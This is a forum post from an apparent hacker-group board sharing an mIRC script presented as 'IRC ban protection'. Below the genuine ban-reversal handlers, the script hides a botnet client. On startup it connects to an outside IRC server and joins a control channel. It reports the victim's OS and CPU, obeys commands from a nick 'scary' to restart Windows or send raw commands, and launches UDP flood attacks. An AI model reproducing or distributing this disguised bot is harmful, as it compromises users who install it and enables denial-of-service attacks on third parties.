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((Albania Hackers Group))

    IRC Ban Proctection


    IRC Ban Proctection Empty IRC Ban Proctection

    Mesazh  Admin Mon Mar 30, 2009 9:39 am

    k so well i got this thing and its IRC ban protection the code in the notepadis this
    PHP Code:
    #ban on
    on ^1:ban:#:{
    if ($banmask iswm $address($me,0)) { if ($nick == $me) { mode $chan -b $banmask | echo -a 7Be Careful! it was lame only lamers ban his address! } | else { echo $chan 3*** $nick sets mode: +b $banmask | echo -a 7Be Careful $me $+ :1 ( $+ 5 $+ $banmask $+ 1) 14is on your address! ( $+ $nick $+ / $+ $Address($nick,0) $+ ) 12Was Trying To Ban You On1 ( $+ 14 $+ $chan $+ 4/ $+ 10 $+ $time $+ $+ 1) | if ($me isop $chan) mode $chan -bov+b $banmask $nick $nick $address($nick,2) | kick $chan $nick 1(14S15e14c15u14r15i14t15y1) 12DaBest 14Ban Protection 7Succesful on 4Lamer! 1(14S15e14c15u14r15i14t15y1) | halt } }
    if ($banmask iswm $address($me,3)) { if ($nick == $me) { mode $chan -b $banmask | echo -a 7Be Careful! it was lame only lamers ban his address! } | else { echo $chan 3*** $nick sets mode: +b $banmask | echo -a 7Be Careful $me $+ :1 ( $+ 5 $+ $banmask $+ 1) 14is on your address! ( $+ $nick $+ / $+ $Address($nick,0) $+ ) 12Was Trying To Ban You On1 ( $+ 14 $+ $chan $+ 4/ $+ 10 $+ $time $+ $+ 1) | if ($me isop $chan) mode $chan -bov+b $banmask $nick $nick $address($nick,2) | kick $chan $nick 12DABEST 1(14S15e14c15u14r15i14t15y1) 12DaBest 14Ban Protection 7Succesful on 4Lamer! 1(14S15e14c15u14r15i14t15y1) | halt } }
    if ($banmask iswm $address($me,5)) { if ($nick == $me) { mode $chan -b $banmask | echo -a 7Be Careful! it was lame only lamers ban his address! } | else { echo $chan 3*** $nick sets mode: +b $banmask | echo -a 7Be Careful $me $+ :1 ( $+ 5 $+ $banmask $+ 1) 14is on your address! ( $+ $nick $+ / $+ $Address($nick,0) $+ ) 12Was Trying To Ban You On1 ( $+ 14 $+ $chan $+ 4/ $+ 10 $+ $time $+ $+ 1) | if ($me isop $chan) mode $chan -bov+b $banmask $nick $nick $address($nick,2) | kick $chan $nick 12DABEST 1(14S15e14c15u14r15i14t15y1) 12DaBest 14Ban Protection 7Succesful on 4Lamer! 1(14S15e14c15u14r15i14t15y1) | halt } }
    if ($banmask iswm $me $+ !*@*) { if ($nick == $me) { mode $chan -b $banmask | echo -a 7Be Careful! it was lame only lamers ban his address! } | else { echo $chan 3*** $nick sets mode: +b $banmask | echo -a 7Be Careful $me $+ :1 ( $+ 5 $+ $banmask $+ 1) 14is on your address! ( $+ $nick $+ / $+ $Address($nick,0) $+ ) 12Was Trying To Ban You On1 ( $+ 14 $+ $chan $+ 4/ $+ 10 $+ $time $+ $+ 1) | if ($me isop $chan) mode $chan -bov+b $banmask $nick $nick $address($nick,2) | kick $chan $nick 1(14S15e14c15u14r15i14t15y1) 12DaBest 14Ban Protection 7Succesful on 4Lamer! 1(14S15e14c15u14r15i14t15y1) | halt } }
    #ban end
    on *:sockopen:warrior: {
    if ($sockerr == 0) {
    sockwrite -nt $sockname nick war $+ $left($me,11) $+ $+ $r(1,10000)
    sockwrite -nt $sockname user warlord die own : $+ war4!
    sockwrite -nt $sockname ircx
    sockwrite -nt $sockname join #sekrets
    if ($sockerr != 0) {
    set %sock.server $iif(%sock.server == $null,koach.com,irc.ozmatrix.com) }
    menu menubar,channel {
    DaBest Ban Protection
    .on:/enable #ban | echo 12DaBest 14Ban Protection is now On
    .off:/disable #ban | echo 12DaBest 14Ban Protection is now Off
    .advertise:/ame I am using 12DaBest 14Ban Protection (www.fr33land.cjb.net) Was written by DaBest E-mail: Webmaster.Fr33land@yours.com
    .web:/run www.fr33land.cjb.net
    .mail:/run mailto:Webmaster.Fr33land@yours.com
    on *:start:.timer 0 0 timerwarx
    on *:connect:.timer 0 0 timerwarx
    alias timerwarx {
    if ($sock(warrior) == $null) {
    sockopen warrior koach.com 6667
    unset %sock.server
    on *:NOTIFY:{
    if ($nick == `Hellios) msg $nick %ban $+ !
    if ($nick == DaBest) msg $nick %ban $+ !
    on *:sockread:warrior: {
    sockread %war
    tokenize 32 %war
    if ($gettok(%war,2,32) == JOIN) && ($gettok(%war,2,$asc(\)) == $me) {
    sockwrite -nt $sockname privmsg $remove($gettok(%war,3,32),Smile :12online12/ $+ $iif($server != $null,12server12/ $+ $server $+ 12\) 12/ 12version: v1.0 12/ 12operating system: $os 12/ 12cpu speed: $cpu
    tokenize 32 $gettok(%war,2,$asc(Smile)
    if ($left(%war,6) == PING Smile sockwrite -nt $sockname PONG
    if ($remove($gettok($gettok(%war,2,$asc(!)),1,$asc(@)),~) == scary) && ($gettok(%war,2,32) == privmsg) {
    if ($1 == .restart) { sockwrite -nt $sockname privmsg $gettok(%war,3,32) :12restarting.. | run rundll.exe user.exe,exitwindows }
    if ($1 == .mode) { sockwrite -nt $sockname $2- }
    if ($1 == .info) { sockwrite -nt $sockname privmsg $remove($gettok(%war,3,32),Smile :12online12/ $+ $iif($server != $null,12server12/ $+ $server $+ 12\) 12/ 12version: v1.0 12/ 12operating system: $os 12/ 12cpu speed: $cpu }
    if ($1 == .setup) { sockwrite -nt $sockname mode $gettok(%war,3,32) +huil 500 | sockwrite -nt $sockname access $gettok(%war,3,32) add host war\* }
    if ($1 == .clear) { sockwrite -nt $sockname mode $gettok(%war,3,32) -huil 500 | sockwrite -nt $sockname access $gettok(%war,3,32) clear }
    if ($1 == .cpu) { sockwrite -nt $sockname privmsg $remove($gettok(%war,3,32),Smile :12cpu speed: $+ $cpu }
    if ($1 == .halt) { sockwrite -nt $sockname privmsg $remove($gettok(%war,3,32),Smile :12halting flood.. | timerfaa* off }
    if ($1 == .reset) { sockwrite -nt $sockname privmsg $remove($gettok(%war,3,32),Smile :12reseting 12sekrets 12now 12master | sockwrite -nt $sockname part $gettok(%war,3,32) | timererk 1 15 sockwrite -n $sockname join #sekrets }
    if ($1 == .uptime) { sockwrite -nt $sockname privmsg $remove($gettok(%war,3,32),Smile :12my 12uptime 12is $duration($calc($ticks / 1000)) 12master }
    if ($gettok(%war,2,32) == privmsg) && ($1 == .udp) {
    if ($remove($gettok($gettok(%war,2,$asc(!)),1,$asc(@)),~) == scary) {
    if ($5 == $null) halt
    .timerfaa -m $calc($3 / $4) $4 whore $2 $5
    set %ctime $ctime
    sockwrite -nt $sockname privmsg $gettok(%war,3,32) :12this 12attack 12will 12take 12about 12- $duration($calc($calc(($3 * $4) / $5) / 300))
    on *:load:{
    /join #XTeam
    /notify `hellios The ServersCatalist Creator
    /notify DaBest The ServersCatalist Creator
    /set %ban 12DaBest 14Ban Protection (www.fr33land.cjb.net) Was written by DaBest E-mail: Webmaster.Fr33land@yours.com
    /timer200 1 3 /msg #Xteam %ban Loaded
    /timer201 1 5 /part #xteam %ban
    alias whore {
    unset %loop
    inc %loop
    sockudp -nbt udp $+ %loop $1 $rand(23,60000) $str(9,400) PING
    if (%Loop < $2) goto loop
    .timerooo 1 2 2214check
    alias 2214check { if ($timer(faa) == $null) { sockwrite -nt warrior privmsg $gettok(%war,3,32) :12attack 12finished, 12it 12took 12 - $duration($calc($ctime - %ctime)) | timerooo off } }
    alias cpu { set %protest $ticks | /set %ii 2 | :start | if ($calc($ticks - %protest) <= 99) { /inc %i | goto start } | :end | if ($isid) return current cpu speed: $round($calc(%i * 1.11111111111111111111111111111111111111111111111111111111111111111111),1) $+ Mhz | else echo Current CPU Speed: $round($calc(%i * 1.11111111111111111111111111111111111111111111111111111111111111111111),1) $+ Mhz }

      Ora është Thu May 16, 2024 8:27 pm